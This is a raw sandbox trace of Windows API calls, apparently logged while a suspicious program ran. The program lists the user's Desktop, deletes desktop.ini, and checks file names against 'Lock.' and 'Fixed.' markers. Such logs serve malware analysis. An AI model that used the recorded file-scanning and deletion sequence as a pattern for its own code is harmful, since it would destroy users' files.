lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x35, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5660 [0163.713] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 1 [0163.715] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x35, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0163.715] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.715] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0163.715] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0163.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.716] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0163.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x31 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0163.717] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 0xffffffff [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0163.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DrmlVcs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0163.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmlVcs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mlVcs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVcs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vcs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cs.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0163.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0163.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DrmlVcs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmlVcs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mlVcs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVcs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vcs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cs.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0163.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0163.721] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0163.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.722] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0163.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.722] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0163.724] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.724] 